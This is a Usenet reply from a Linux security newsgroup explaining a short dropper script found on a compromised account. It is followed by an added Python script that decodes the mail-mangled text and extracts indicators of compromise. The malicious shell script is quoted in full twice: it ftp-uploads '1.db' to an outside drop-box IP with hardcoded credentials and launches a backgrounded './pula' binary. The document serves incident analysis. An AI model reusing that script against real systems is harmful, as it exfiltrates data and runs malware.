Re: Phishing Attempt
- From: ibuprofin@xxxxxxxxxxxxxxxxxxxxxx (Moe Trin)
- Date: Tue, 02 Oct 2007 14:46:04 -0500
On Tue, 02 Oct 2007, in the Usenet newsgroup comp.os.linux.security, in article
<47024555$0$15142$afc38c87@xxxxxxxxxxxxxxxxxxxx>, Mark wrote:
> Mark wrote:
> > The account home directory contained a simple shell script of just over
> > a dozen lines. I can't see what it's doing there.
> OK below is the text of the script as it was sent back to me.
Confusion - above you say the script was in the home directory, while
here, you say it was sent back to you. WTF?
> I can normally understand shell scripts, but I can't see what this one
> is doing.
Your Linux box may only have a soft link from /usr/share/man/man1/sh.1
to something else - probably /usr/share/man/man1/bash.1 - you can follow
that to see what it's doing.
[useless empty lines deleted]
> #!/bin/sh
> HOST=3D'58.105.225.59'
That sets the variable 'HOST' to the IP address you are posting from.
The '=3D' is a mime abortion which actually translates to an equal sign.
> USER=3D'test'
> PASSWD=3D'testing'
> FILE=3D'1.db'
Setting three more variables - what is the contents of file "1.db" in
this home directory?
> =20
More mime crap - actually a space character
> ftp -n $HOST <<END_SCRIPT
> quote USER $USER
> quote PASS $PASSWD
> put $FILE
> quit
> END_SCRIPT
run the ftp command, connecting to the ftp server on 58.105.225.59,
logging in as user test with password testing, and uploading the file
'1.db' from the current directory on the host this script is run from,
and then quitting.
> sleep 70
> ./pula &
Sleep for 70 seconds, and then run the application 'pula' which is also
in the current directory, putting that application into the background.
'pula' is a city in Croatia (14E/45N), the currency of Botswana (where
it apparently means "rain"), and seems to be some form of windoze worm
or virus that may have originated in Indonesia. I hadn't heard of it
affecting Linux before, and it doesn't show up in the list of malware
searched for in the windoze-wannabe "tools" chkrootkit or rkhunter.
Perhaps you should be looking at that file - starting with the command
file ./pula
if you haven't wiped the directory already.
> exit 0
That's the end of the script. Not knowing what's in the 'pula' file,
it's not possible to say what's going on, but this thing you quoted
seems to be running the 'pula' file, sleeping for 70 seconds. It's
also ftp'ing a file named '1.db' to the ftp account 'test' on the host
58.105.225.59. Did you look to see what is in there?
Actually, this looks more as if the host 58.105.225.59 is/was being used
as a 'drop-box', and you may find it useful searching that system to see
where the files are going. It _could_ be that another computer elsewhere
was connecting to the ftp server on 58.105.225.59 using the same account
name/password, and 'get'ing (and perhaps removing) the file, in which
case the only evidence might be in the (non-existent) ftp server logs.
Old guy
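As an added example (not part of the newsgroup post, and not written by either poster), the following Python script does mechanically what the reply above does by hand: it strips the MIME quoted-printable debris (`=3D`, `=20`) from a script pasted through e-mail, then walks the decoded shell script and pulls out the indicators an incident responder would want recorded: variable assignments, the ftp drop-box host and the credentials and filenames passed to it, any sleep delay, and any binary the script launches (and whether it is backgrounded). The sample script embedded below is the one quoted in the thread, copied as it appeared with the MIME escapes still in place; the parser only understands the simple constructs that script uses (plain `VAR=value` assignments, an `ftp ... <<TAG` heredoc with `quote USER`/`quote PASS`/`put`/`get`, `sleep N`, and `./name &`) and would need extending for anything fancier.

```python
"""Static triage of a quoted-printable-mangled dropper script (added example)."""
import quopri
import re

# Constructed sample: the script exactly as quoted in the thread, still
# carrying the quoted-printable escapes (=3D for '=', =20 for a space).
SAMPLE_QP = """#!/bin/sh
HOST=3D'58.105.225.59'
USER=3D'test'
PASSWD=3D'testing'
FILE=3D'1.db'
=20
ftp -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASSWD
put $FILE
quit
END_SCRIPT
sleep 70
./pula &
exit 0
"""

ASSIGN_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)=(['\"]?)(.*?)\2\s*$")
HEREDOC_RE = re.compile(r"^\s*ftp\b(.*?)<<-?\s*['\"]?(\w+)['\"]?\s*$")
SLEEP_RE = re.compile(r"^\s*sleep\s+(\d+)")
EXEC_RE = re.compile(r"^\s*(\.?/[^\s;&|]+)")   # ./pula, /tmp/x, etc.
VAR_RE = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")


def decode_qp(text):
    """Undo MIME quoted-printable: '=3D' -> '=', '=20' -> ' '."""
    return quopri.decodestring(text.encode("ascii")).decode("ascii")


def expand(value, env):
    """Substitute $VAR / ${VAR} using the assignments seen so far."""
    return VAR_RE.sub(lambda m: env.get(m.group(1), m.group(0)), value)


def parse_ftp_session(args, body, env):
    """Extract host, credentials and transferred files from an ftp heredoc."""
    hosts = [t for t in expand(args, env).split() if not t.startswith("-")]
    session = {"host": hosts[-1] if hosts else None, "user": None,
               "password": None, "put": [], "get": []}
    for raw in body:
        words = expand(raw, env).split()
        if not words:
            continue
        if words[0] == "quote" and len(words) >= 3:        # raw protocol verbs
            if words[1].upper() == "USER":
                session["user"] = words[2]
            elif words[1].upper() == "PASS":
                session["password"] = words[2]
        elif words[0] == "user" and len(words) >= 3:       # ftp's own 'user name pass'
            session["user"], session["password"] = words[1], words[2]
        elif words[0] in ("put", "send", "mput") and len(words) >= 2:
            session["put"].extend(words[1:])               # data leaving the host
        elif words[0] in ("get", "recv", "mget") and len(words) >= 2:
            session["get"].extend(words[1:])               # second stage pulled down
    return session


def triage(script):
    """Walk a decoded shell script and collect indicators of compromise."""
    env = {}
    report = {"variables": {}, "ftp": [], "sleep": [], "exec": []}
    lines = script.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = expand(m.group(3), env)
            report["variables"][m.group(1)] = env[m.group(1)]
            continue
        m = HEREDOC_RE.match(line)
        if m:
            terminator, body = m.group(2), []
            while i < len(lines) and lines[i].strip() != terminator:
                body.append(lines[i])
                i += 1
            i += 1                                          # skip the terminator
            report["ftp"].append(parse_ftp_session(m.group(1), body, env))
            continue
        m = SLEEP_RE.match(line)
        if m:
            report["sleep"].append(int(m.group(1)))
            continue
        m = EXEC_RE.match(line)
        if m:
            report["exec"].append({"path": m.group(1),
                                   "background": line.rstrip().endswith("&")})
    return report


if __name__ == "__main__":
    for key, value in triage(decode_qp(SAMPLE_QP)).items():
        print(f"{key}: {value}")
```

Run against the quoted script, the report names 58.105.225.59 as the drop-box, test/testing as the credentials, 1.db as the file being exfiltrated, a 70-second delay, and ./pula as the backgrounded payload; the `exec` entries are the files to hand to `file`, `strings` and a hash lookup before the directory is wiped, and the `ftp` entries are what to search for in any network logs covering the box.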